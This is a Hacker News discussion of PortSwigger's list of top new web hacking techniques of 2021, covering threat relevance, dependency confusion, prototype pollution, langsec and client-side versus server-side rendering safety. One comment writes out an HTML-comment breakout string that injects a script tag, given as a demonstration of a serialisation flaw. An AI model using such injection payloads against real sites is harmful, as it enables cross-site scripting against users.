Hacker News new | past | comments | ask | show | jobs | submit login
Web hacking techniques of 2021 (portswigger.net)
567 points by adrianomartins on Feb 10, 2022 | hide | past | favorite | 50 comments



This guy's work always impresses me. He had a nice Blackhat brief as well.

This list is great and all for redteamers but as a defender, I would like to know if any actual threat actors used these techniques even after publication. Even with all the secret/private and public threat intel I am aware of, none of them register. Not knocking down on threat research, I am honestly curious because I can't tell if I should be on the look out for any real threat actors using these techniques.


Yes, actual threat actors use these techniques even after publication. There is a lot of outdated/misconfigured systems in the wild. A fairly recent example is the defacing of multiple Ukrainian government websites[1], through exploiting a vulnerability fixed and publicised in august 2021. There's also around 10,000 (can't remember where that statistic is from) Huawei routers on the internet vulnerable to an issue from 2015, which are constantly being infected with botnet worms.

[1] https://www.bleepingcomputer.com/news/security/multiple-ukra...


I know web exploits happen all the time first hand.

> all 15 compromised Ukrainian sites were using an outdated version of the October CMS, vulnerable to CVE-2021-32648.

That cve looks like it was caused by someone doing == instead of === in php.

My question was things like request smuggling and protocol abuse attacks have ever been seen in the "wild".


The work on exploiting prototype pollution was excellent https://blog.s1r1us.ninja/research/PP

I didn’t know about the --disable-proto option in node or the Document Policy proposal for dealing with it.

Amazing that 80% of nested query parameter parsers were susceptible to prototype pollution.


As a web programmer, for whom the majority of this article is not only new, but difficult to comprehend, it makes me yearn to improve my web security knowledge. Any pointers?


I suggest going through cheatsheets on OWASP. Most of it is comprehensible to any web programmer. Here's one example:

https://cheatsheetseries.owasp.org/cheatsheets/PHP_Configura...


Do some of your own hacking on hackthebox.com. It is shocking what can be done with only a week of security training by an already experienced programmer. It becomes clear that the typical software engineer doesn't give a single thought to security.


You can look at the disclosed reports on hackerone and get a feel for the kind of stuff that's being exploited and how it's being addressed.


Go through each line item in the article and create a proof of concept for yourself. You will learn a lot along the way too.


The dependency confusion article on Medium was a great read.


Beautifully simple! Exfiltrating data via a DNS request was a nice little trick too.


It's a really good article and apologies to the author for nitpicking but even as a bona fide Python fanboy I had to raise my eyebrows at this statement:

> Some programming languages, like Python, come with an easy, more or less official method of installing dependencies for your projects.


I mean, have you ever used a language like Java? Python has a bad package manager story, sure, but it has a package manager story - that's not actually particularly global afaik


Link for those who went straight to comments: https://medium.com/@alex.birsan/dependency-confusion-4a5d60f...


It's amazing that such a simple vulnerability can be leveraged in practice to gain access to so many machines on so many different organizations. Props to the researcher!


Five out of ten new techniques are langsec, which makes them inherently difficult to fix, yet we keep using unreasonably complex languages for protocols and keep stapling on more complexity, resulting in formally assured insecurity.


http://langsec.org/ does a spectacularly poor job of introducing langsec to the uninitiated. It appears to be a list of conferences and papers for academics, followed by http://langsec.org/bof-handout.pdf which makes unsubstantiated assertions and doesn't elaborate. I think more people would learn about langsec if the homepage contained an introduction followed by a guided tour of articles which incrementally teach the current state of the field in an organized accessible fashion.

EDIT: I found https://scribe.rip/1b92451d4764 which purports to be an "introduction followed by a tour", which links to “Security Applications of Formal Language Theory” and “The Seven Turrets of Babel: A Taxonomy of LangSec Errors and How to Expunge Them”. The second seems not very practical/applied or hands-on, and the first is quite long and academic (I haven't read it yet). It might be useful as reference material, but I'd be interested to see examples of designing/refactoring systems to be more secure based on langsec.


I was full time infosec from 1998 until 2015 then moved into an adjacent role that is still technically infosec but is more infrastructure/platform controls. This is the first time i recall ever seeing the term.

Based on reading the two sentence synopsis in Google results it’s largely indistinguishable from the more familiar “formal methods” or “formal verification”.


KTH has a course called Language based security ( https://www.kth.se/student/kurser/kurs/DD2525?l=en ) which indeed does come from people involved in formal methods.

Formal methods is a huge area though, but in essence it's about establishing proofs of correctness.


The paper linked in your EDIT is awesome. I'm an AppSec engineer and I had never encountered a term like "shotgun parser". What the authors describe as shotgun parsing is exactly what I've seen from reviewing validation logic across hundreds of enterprise applications. It's nice to have a name for the pattern.

The worst part of shotgun parsing and loosely defined input structure is the difficulty of remediation. I constantly receive pushback from dev teams when I ask them to use regex-based validation per field. What sounds like a simple task actually becomes extremely difficult because lots of apps populate datasets via convoluted monolithic endpoints. Dev teams would have to change the way in which shared services structure and output information. Those shared services are frequently maintained by other teams and any other application which consume the same data would also need to be modified.

In the end, it becomes a compromise where the ad-hoc parsing is tightened/modified to be "good enough". This bubblegum/duct-tape fix only further cements the ad-hoc parsing throughout the org.


It got me thinking, is client side rendering intrinsically safer than SSR.

SQL queries with params are safer because data and code flow separately. Similarly, if you query backend for data and then do textContent = response, that cannot do xss, right?


  >  textContent = response
Good question (that none of the replies seem to address). That is exactly what I would do if rendering 'tainted' text.

Can someone please tell us how it could be defeated ?


This should be safe.


...unless it is a text that the attacker shows to another user, in which case they can trick this user to perform some action (send cryptocurrency,...).


No, client-side rendering is not intrinsically safer than server-side rendering, provided all outputs of serialisation are parsed identically (as is the case for valid HTML trees).

The problems start when you try to manipulate serialised data, which is not safe to do this in the general case. You should instead construct a proper representation of what you desire, and then serialise that, depending on the serialiser to take care of all of this sort of stuff. This approach has always been fairly popular in compiled languages and languages that like types, but dynamic languages have historically significantly preferred to manipulate strings, I suspect because they don’t have good ergonomics on the other approach, and it’s probably slower in interpreted languages—you’ll note that React felt the need to extend JavaScript to make its approach acceptable to people.

Most JavaScript stuff that supports server-side rendering now is working in this way, crafting a DOM tree and then serialising that. Svelte is a notable exception in that it takes a declarative DOM tree and essentially serialises what it can at compile time, thereby still retaining the required safety guarantees.

There are definitely downsides to strict adherence to the model of crafting a data structure and then serialising it; most significantly, you can’t start streaming a response until you’re done. The solution for this is to use an append-only data structure (or possibly one that allows you to “commit” the document up to a given point, while still allowing mutations in anything that occurs later in the document); thus serialisation can begin before you finish writing the document.

You know the old favourite about parsing HTML with regular expressions? <https://stackoverflow.com/questions/1732348/regex-match-open...> (If not, enjoy!) This is the thing people need to understand and realise in the general case: serialised data should be treated as opaque, and only interacted with after real parsing and before real serialisation.

HTTP headers aren’t strings; "Date: Tue, 15 Nov 1994 08:12:31 GMT" is a serialised HTTP header, representing the actual header that’s more like {Date, 1994-11-15T08:12:31Z}. And that latter is the form you should interact with it in.

HTML isn’t strings; "<p>Hello, world!</p>" is the serialised form of a paragraph element containing a text node with data “Hello, world!”. And that’s the form you should interact with it in.

Yes, I am presenting a strongly-opinionated position that lacks any shade of pragmatism. Yes, my website is generated with templates that manipulate serialised HTML. Eventually I’ll replace it with something more sound.

One last note: at the start I said valid HTML, because it’s not enough to just serialise an arbitrary HTML DOM tree, as you can easily craft invalid HTML DOM trees, like nesting hyperlinks. In most regards, the XML syntax of HTML (still a thing) is actually a safer target to serialise to because then you don’t even need to validate your tree to be confident it won’t get mangled by the serialise/parse round-trip.


Sorry, what do you mean by parsed identically? In CSR you can have data displayed into the front-end without ever be parsed as HTML. You do some http call to the backend, get a json get the property and do, element.textContent = myData. If that's unsafe there would be a bug in the browser, ain't it?


I was going to use optional start tags and tbody as my example, but on checking the spec it turns out that tr is actually valid as a direct child of table, even if the HTML syntax will prevent you from creating it by inserting a tbody around it. (XHTML 1.0 validation also confirms that tbody is genuinely optional there.) This actually undermines my “as is the case in valid HTML”—but never mind, I’ll demonstrate what the point was, and what is at least generally the case.

So let’s go with a more egregious invalidity: nested links. Which browsers do actually support, but HTML syntax doesn’t. Suppose you produce this DOM tree (server side or client side, I don’t care):

  p
  ├ #text "Look at this "
  ├ a href="https://a.example"
  │ ├ #text "link with "
  │ ├ a href="https://b.example"
  │ │ └ #text "nesting"
  │ └ #text " like so"
  └ #text "!"
(Client-side, you could generate it like this:

  let p = document.createElement("p");
  let a1 = document.createElement("a");
  let a2 = document.createElement("a");
  a1.href = "https://a.example";
  a2.href = "https://b.example";
  a2.append("nesting");
  a1.append("link with ", a2, " like so");
  p.append("Look at this ", a1, "!");
)

That serialises to this in both HTML and XML syntaxes:

  <p>Look at this <a href="https://a.example">link with <a href="https://b.example">nesting</a> like so</a>!</p>
(Client-side, `p.outerHTML`; `new XMLSerializer().serializeToString(p)` shows the XML syntax, which is the same modulo an xmlns attribute for XML reasons. Incidentally, `p.outerHTML` gives you HTML syntax for an HTML-syntax document and XML syntax for an XML-syntax document, which mostly means if you served the file with the application/xhtml+xml MIME type.)

But parse that with the HTML syntax, and the nested links break (e.g. `document.body.innerHTML = p.outerHTML`):

  p
  ├ #text "Look at this "
  ├ a href="https://a.example"
  │ ├ #text "link with "
  ├ a href="https://b.example"
  │ └ #text "nesting"
  └ #text " like so!"
And that is the steady state (meaning you can round-trip it again as much as you like and it will no longer change):

  <p>Look at this <a href="https://a.example">link with </a><a href="https://b.example">nesting</a> like so!</p>
Returning to the initial remark you’re asking about: I wrote that having more than just HTML in mind (kind of why I brought HTTP into it later on, and because other formats like Markdown may be being used, and who knows about it; and in the parent comment, SQL parameters had been mentioned, which is also a good example of the issue in hand), that this is a general remark about stability and safety: that interpolating strings raw is just dangerous, and that you should parse and serialise—provided the format has been designed so that that’s a safe operation. As it happens, the typical DOM tree representation of HTML doesn’t protect you enough, so you need to work with valid HTML for it to be fully robust.

Actually, I’ve just thought of the perfect example of why valid HTML is important when you’re crafting a tree for serialisation, because it actually would introduce an injection vulnerability: comments. Contemplate this:

  document.createComment('--><script>alert("pwnd")</script><!--')

  #comment "--><script>alert("pwnd")</script><!--"

  <!-- --><script>alert("pwnd")</script><!-- -->
Or you could break scripts by injecting </script> or stylesheets by injecting </style>, given that they don’t use HTML entity escaping. I think these are the only cases where invalid HTML could actually be harmful; most places (not that there are many—optional start tags, link nesting and paragraph nesting are just about it) it’ll just shuffle the DOM slightly.

Y’know what? I’m starting to think even the tree form is rather dangerous to work in for HTML. XML syntax protects you from almost all inconsistency, but doesn’t guard against that comment attack (that’s literally the only thing it’ll miss) and loses the <noscript> element.

I’m tempted to retract my position that client-side rendering is not intrinsically safer than server-side, but so long as you have a step that validates your HTML before you serialise it, you’re still OK (and even the breakages depend on injecting arbitrary content into a comment, script tag or style tag, which are all extremely unlikely), so I retain my position, now hanging precariously from that delicate thread of the word “intrinsically”. I think there’s a gaping chasm below me. Hopefully there’s something soft to land on.


quick unrelated question: do you use a tool to draw the indent levels?


I typed it out manually in Vim using its built-in digraphs to get the box drawing characters: <C-K>vv for the vertical line, <C-K>vr for the vertical-and-right line, <C-K>ur for the up-and-right line.

See also https://news.ycombinator.com/item?id=30273299 for related discussion yesterday and one popular tool that helps with related things, if not this specific style of illustration.


if you use a template engine with sane defaults, you can achieve the same level of safety.


Anytime is possible for the data that returns to be interpolated by the client, you could have xss or related attack.

Client side rendering does help but mistakes are still regularly made. Sometimes by the app dev, sometimes by the framework dev.

You could probably go to an extreme and return all of your application data as sprites.


Of course you can still do <div> + input + </div> in CSR, but you can definitely not do myelement.textContent = whateverIGot in SSR, right?


you can use a template engine that escapes all variables by default. in either case, it's just about coding defensively and being secure by default


Then why is parameter query safer? And not just escapes variables? Escaping is hard, as shown in the article


generating html using find and replace/regex safely is hard. escaping is easy. and the solution is to just not generate html using find and replace. You'll run into the exact same problem trying to do a bbcode/markdown/whatever parser using javascript


Not super on topic, but every time this site is linked, I never properly read the URL correctly. My brain immediately thinks the space is between the 's' and 'w'


Same with expertsexchange.com


thanks, now i’ll never be able to read it properly again. :(


Interesting community built list of the top 10 web hacking vulnerabilities used in 2021. If you're making a web product you might want your team to quickly run over these.


It's not the top 10 used, it's the top 10 new for 2021 techniques, and specifically excludes older techniques.


Man the JSON inconsistency one is creative. I know it's not consistent implementation across languages, but I don't know it can be used to such attacks.


Yes. The big take-away for me, whether it's JSON or YAML or XML or whatever: never parse anything more than once (and definitely not with different parsers).


Anyone here that works on these kind of deep-dive type of security research? Can you give a TLDR of how do you usually set everything up to find these results?

As in, do you set up some sort of test environment/website with full debug logs and take if one step at a time from there? If so, how to you ensure that it is realistic and relevant to real world use since real-world architecture might differ from a setup that worked in your experiments?

I ask this because I used to do some bug bounties and it consisted of a lot of painful trial and error. I can't imagine anything new and profound can be found that way.

(PS in case it isn't obvious I didn't open up the research links and read in detail, hence a tldr)


I am a security researcher referenced in the winning web-hacking technique on that list ("Dependency Confusion" by Alex Birsan [1]) and was ranked 7th in Portswigger's 2019 issue [2,3]. My motto has always been "Learn to make it; then break it." In other words, I invest a lot of time familiarising myself with technologies and specifications before examining how their implementation might lead to security flaws. This process usually requires reading a lot of technical documentation and source code, and becoming acquainted with how organisations implement said technologies.

Once I feel comfortable with my understanding of the subject material, I start to think about how certain aspects of the technology could lead to security flaws or interesting areas of research. At times this may require out-of-the-box thinking or can even be the result of pure luck.

The "bug bounty" aspect of this all tends to come into play once I want to find case studies for my research.

[1]: https://medium.com/@alex.birsan/dependency-confusion-4a5d60f...

[2]: https://portswigger.net/research/top-10-web-hacking-techniqu...

[3]: https://edoverflow.com/2019/ci-knew-there-would-be-bugs-here...


Kind of feels a little repetitive to have request smugguling on the list 3 different times.


It baffles me how convoluted and complex the webapp attacks have become over the past few years.

I think this is an effect of bug-bounty hunting, which has pretty much opened the research on those topics to a massive community.


What about GWT-Google Web Toolkit its actually not so many updated and under top news but the idea is implement in a prooven language java both frontend and backend


The hn title needs updating as it's misleading, even if it reflects the title on the website. The first sentence even clarifies it's only new techniques.

"Welcome to the Top 10 (new) Web Hacking Techniques of 2021, the latest iteration of our annual community-powered effort to identify the most significant web security research released in the last year".

The top web hacking techniques used and the top new ones I would expect to be very different lists.


I'm not an expert here, but truly interested to hear responses to this question.

To say that 1+1=2 is "true", does that not require a corollary in "reality" to something fundamental that can be called a "one" object? I believe this is called mathematical constructivism.

Imagine, hypothetically, that we cannot identify something that is physically fundamental and individual. My question is whether any mathematics in that scenario could be considered "true" without such constructivism, in other words, without a physical correspondence to an unquestionably, physically fundamental "one" object.


Sir, this is a Wendy’s




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: